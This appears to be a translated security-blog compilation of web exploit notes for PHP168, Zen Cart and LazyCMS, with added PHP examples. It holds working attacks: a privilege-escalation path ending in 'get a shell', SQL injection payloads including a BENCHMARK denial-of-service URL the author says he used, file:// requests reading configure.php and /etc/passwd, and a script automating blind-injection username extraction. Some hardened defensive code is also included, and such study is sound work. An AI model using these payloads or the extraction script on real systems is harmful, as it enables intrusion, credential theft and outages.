PHP168 V6.01 privilege escalation vulnerability

PHP168 is a full-site content management system written in PHP. The vendor bills it as one of the most feature-rich PHP site-building systems: it is fully open source, and its function modules can be installed and removed independently.

HPCMS V6.01: the security issue in detail

Register an ordinary member account, log in, and open http://www.xxxx.com/member/buygroup.php?job=buy&gid=3
You will see:

The page shows the account's current group (ordinary member), the group that is about to be "bought", and the payment required for it: 0.

Once the page returns, the account has been moved into the higher member group; go back to the member centre and confirm it.
Then find the admin backend, log in with the upgraded account, and get a shell.
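The flaw behind the steps above is a purchase that is gated only by price, so a privileged group that costs 0 is free to "buy". The following is an added example, not PHP168 code: it models a buygroup.php-style handler over constructed in-memory data (group names, prices and balances are made up, and gid 3 is assumed to be the privileged group the post's URL points at), first in the leaky shape and then with the checks a practitioner would add.

```php
<?php
// Added example, not PHP168 code. It models the group purchase a member/buygroup.php
// style handler performs, with constructed in-memory data instead of a database, to
// show why a 0-priced privileged group is a privilege escalation and how to close it.

// Constructed sample data: group 3 is an administrator-level group that costs nothing.
$GROUPS = [
    1 => ['name' => 'ordinary member', 'price' => 0,  'purchasable' => true,  'is_admin' => false],
    2 => ['name' => 'VIP member',      'price' => 50, 'purchasable' => true,  'is_admin' => false],
    3 => ['name' => 'administrator',   'price' => 0,  'purchasable' => false, 'is_admin' => true],
];

// Vulnerable pattern: any gid the client sends is looked up and "bought". The only
// check is the balance, and 10 >= 0, so ?job=buy&gid=3 moves the account into group 3.
function buy_group_vulnerable(array $user, array $groups, int $gid): array {
    if (!isset($groups[$gid])) {
        return $user;
    }
    $price = $groups[$gid]['price'];
    if ($user['money'] >= $price) {
        $user['money'] -= $price;
        $user['groupid'] = $gid;
    }
    return $user;
}

// Hardened pattern: whether a group is for sale is a server-side property of the group,
// admin groups are never purchasable regardless of price, and the client-supplied gid
// is only ever a lookup key, never a statement of what the member is entitled to.
function buy_group_hardened(array $user, array $groups, int $gid): array {
    if (!isset($groups[$gid])) {
        return $user;
    }
    $g = $groups[$gid];
    if ($g['is_admin'] || !$g['purchasable'] || $gid === $user['groupid']) {
        return $user;                     // refuse: privileged, not for sale, or a no-op
    }
    if ($user['money'] < $g['price']) {
        return $user;                     // refuse: cannot pay
    }
    $user['money'] -= $g['price'];
    $user['groupid'] = $gid;
    return $user;
}

$member = ['uid' => 42, 'groupid' => 1, 'money' => 10];   // constructed fresh account

$after = buy_group_vulnerable($member, $GROUPS, 3);
printf("vulnerable: uid %d now in group %d (%s)\n",
    $after['uid'], $after['groupid'], $GROUPS[$after['groupid']]['name']);

$after = buy_group_hardened($member, $GROUPS, 3);
printf("hardened:   uid %d still in group %d (%s)\n",
    $after['uid'], $after['groupid'], $GROUPS[$after['groupid']]['name']);
```

The is_admin check is the one that matters: a price is a business rule and can legitimately be 0, so it must never be the thing that decides whether an account may enter a privileged group. In a real install, membership of an administrative group should only ever be assigned from the backend.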
======================================================================
Ways to make PHP reveal the page path (for blind injection)
1. A single quote: '
2. Change id=1 to id=a; works some of the time.
3. Change id=1 to id=1111111111111111111111......; works some of the time.
4. text.php?aa[]=xx (send an array where the script expects a string).
5. PHP's max_execution_time: when the script runs past it, the fatal-error message can include the script path. The limit is usually very small, though, so this suits a target that is already slow to respond.
6. benchmark(999999999999999999, md5('test'))
BENCHMARK(count, expr): BENCHMARK() executes the expression expr repeatedly, count times, which can be used to time how quickly MySQL processes the expression. Its return value is 0. The delay it introduces is what pushes the script over max_execution_time in item 5, and it also gives a yes/no timing signal for blind injection, as in the following payload:
id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*
I once used this for a denial-of-service attack: http://www.xxxx.com/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0x41)) ; the precondition is that the parameter can be injected.
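The payload above asks one question per request (is the first character 'a'?). The following is an added example, not code from the post, that automates the same BENCHMARK() timing oracle and goes a step further by binary-searching each character with ord(...) > N comparisons, roughly seven requests per character instead of up to 127. The page, table and column names (show.php?id=, user, userid, username) and the benchmark count are taken from the post's payload; the fake target at the bottom is constructed so the script runs offline.

```php
<?php
// Added example, not code from the post. Automates the BENCHMARK() timing oracle of the
// payload above, binary-searching each character of username. The target names come
// from the post's payload; fake_target() is a constructed stand-in for the real page.

const BENCHMARK_ROUNDS = 500000;   // the count used in the post's payload

// The injected value of the id parameter for one yes/no question about username.
function build_payload(int $pos, int $charCode, string $op = '>'): string {
    return sprintf(
        "1 union select 1,benchmark(%d,md5('test')),1 from user where userid=1 and ord(substring(username,%d,1))%s%d /*",
        BENCHMARK_ROUNDS, $pos, $op, $charCode
    );
}

// Extracts username one character at a time. $oracle takes a payload and returns the
// response time in seconds; slower than $threshold means the condition held and
// BENCHMARK() ran. ord(substring(...)) is 0 past the end of the string, which ends the loop.
function extract_username(callable $oracle, float $threshold, int $maxLen = 32): string {
    $name = '';
    for ($pos = 1; $pos <= $maxLen; $pos++) {
        $lo = 0;
        $hi = 127;
        while ($lo < $hi) {                     // invariant: ord(char) is in [$lo, $hi]
            $mid = intdiv($lo + $hi, 2);
            if ($oracle(build_payload($pos, $mid, '>')) > $threshold) {
                $lo = $mid + 1;                 // slow response: ord(char) > $mid
            } else {
                $hi = $mid;                     // fast response: ord(char) <= $mid
            }
        }
        if ($lo === 0) {
            break;                              // end of string
        }
        $name .= chr($lo);
    }
    return $name;
}

// Constructed stand-in for the vulnerable page. A real oracle would send the payload as
// ?id= and time the HTTP response; this one evaluates the same condition against a
// made-up username and sleeps 20 ms when it holds, standing in for BENCHMARK()'s delay.
function fake_target(string $payload): float {
    $username = 'admin';                        // constructed secret
    if (!preg_match('/substring\(username,(\d+),1\)\)(>|=)(\d+)/', $payload, $m)) {
        return 0.0;
    }
    $pos  = (int) $m[1];
    $code = $pos <= strlen($username) ? ord($username[$pos - 1]) : 0;
    $held = $m[2] === '>' ? $code > (int) $m[3] : $code === (int) $m[3];
    $start = microtime(true);
    if ($held) {
        usleep(20000);
    }
    return microtime(true) - $start;
}

echo build_payload(1, 97, '='), "\n";          // the post's payload, reproduced
echo "recovered username: ", extract_username('fake_target', 0.01), "\n";
```

Against a real target, calibrate the threshold first by timing a condition that is always false (and 1=2) and one that is always true (and 1=1) with the same benchmark count, and keep the count modest: BENCHMARK() ties up a MySQL thread for its whole run, and a count as large as the one in the denial-of-service URL above turns the probe into the outage the author describes.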
============================================================
Zen Cart file read vulnerability
Get the page path: http://www.xxxx.com/extras/ipn_test_return.php
Get the site's configuration: http://www.xxxxx.com/extras/curltest.php?url=file:///var/www/http/includes/configure.php
Read the Linux passwd file: http://www.xxxx.com/extras/curltest.php?url=file:///etc/passwd
Note: Zen Cart is a free, open-source shopping-cart system aimed at professional online stores.
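The curltest.php URLs above behave as if the url parameter goes straight into curl, which accepts file:// and every other scheme libcurl is built with. The following is an added example, not Zen Cart code: fetch_vulnerable() is the shape that behaviour implies (an assumption, not the script's source), and fetch_hardened() is what a URL fetcher needs if it must stay reachable at all; the test URLs at the bottom are the post's own plus a loopback address.

```php
<?php
// Added example, not Zen Cart code. fetch_vulnerable() is the shape the post's
// curltest.php?url=... behaviour implies; fetch_hardened() pins the scheme, refuses
// private targets and stops redirects from re-introducing either.

function fetch_vulnerable(string $url) {
    $ch = curl_init($url);                       // any scheme libcurl supports: file://, ftp://, gopher://...
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

// True only for http(s) URLs whose host resolves to a public address.
function is_public_http_url(string $url): bool {
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return false;                            // file:///etc/passwd has no host at all
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return false;                            // rejects file:// and everything else
    }
    $ip = gethostbyname($p['host']);             // returns the name unchanged on failure
    // No loopback, link-local, private or otherwise reserved addresses (basic SSRF guard).
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

function fetch_hardened(string $url) {
    if (!is_public_http_url($url)) {
        return false;
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,  // enforced by libcurl as well
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,        // a 302 to file:// or 127.0.0.1 would sidestep the check
        CURLOPT_TIMEOUT         => 10,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

$probes = [
    'file:///etc/passwd',
    'file:///var/www/http/includes/configure.php',
    'http://127.0.0.1/',
    'https://www.example.com/',
];
foreach ($probes as $u) {
    printf("%-48s -> %s\n", $u, is_public_http_url($u) ? 'allowed' : 'rejected');
}
```

Two caveats: gethostbyname() only resolves IPv4, so IPv6-only hosts are rejected rather than checked, and a name that resolves to a public address at check time can be re-pointed at 127.0.0.1 before curl connects (DNS rebinding), which CURLOPT_RESOLVE can pin against. For a test script like this one the simpler fix is to not ship it to production at all.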
============================================================
LazyCMS vulnerabilities
1. Backend exposure: http://www.xxxx.com/page/index.php/System/Index.html
2. Site path disclosure: http://www.xxxx.com/page/index.php/Archives/Search?query=%27&submit.x=11&submit.y=0
The first vulnerability was observed on a live site (an engineering college platform), where the site's FTP was also accessible.
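The LazyCMS query=%27 request and the text.php?aa[]=xx trick in the PHP path-disclosure list above leak the same thing for the same reason: an error message that names the script's full path is sent to the browser. The following is an added example, not code from LazyCMS, PHP168 or any other project on this page; the request-handling functions are hypothetical, the php.ini directives are the real ones, and the request at the bottom is constructed.

```php
<?php
// Added example, not code from any of the CMSes above. Shows the shape of code that
// leaks the web root through "text.php?aa[]=xx" style requests and the settings and
// handler that keep the path on the server. Functions are hypothetical.

// Leaky shape: a GET parameter handed straight to a string function. With ?aa[]=xx,
// $_GET['aa'] is an array, PHP raises a warning (a TypeError on PHP 8) naming the full
// script path, and display_errors=On sends that text to the browser. A quote in ?query=
// does the same thing one layer down, through the database error the broken query raises.
function search_leaky(): string {
    $q = trim($_GET['aa']);
    return 'searched for ' . $q;
}

// Hardening, part 1: production php.ini (shown here via ini_set). Fatal errors such as
// the max_execution_time timeout bypass any user error handler, so display_errors=0 is
// the control that matters; log_errors keeps the diagnostics, path included, in the server log.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
ini_set('html_errors', '0');

// Hardening, part 2: a handler for non-fatal errors that still produces an opaque
// response if something slips through.
set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline): bool {
    error_log("php[$errno] $errstr in $errfile:$errline");   // server side only
    if (!headers_sent()) {
        http_response_code(500);
    }
    echo 'internal error';                                   // nothing about the filesystem
    exit;
});

// Hardening, part 3: validate the parameter's type before any string function sees it.
function search_hardened(): string {
    $q = $_GET['aa'] ?? '';
    if (!is_string($q) || strlen($q) > 200) {
        http_response_code(400);
        return 'bad request';                    // arrays and oversized input never reach trim()
    }
    return 'searched for ' . htmlspecialchars(trim($q), ENT_QUOTES, 'UTF-8');
}

$_GET = ['aa' => ['xx']];                        // constructed request: text.php?aa[]=xx
echo search_hardened(), "\n";                    // bad request, and no path in the response
```

For the query=%27 case the type check is not enough on its own: the quote reaches the database, so the search must use a prepared statement, and display_errors=0 is what stops the resulting SQL error from carrying the path out even if it does not.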
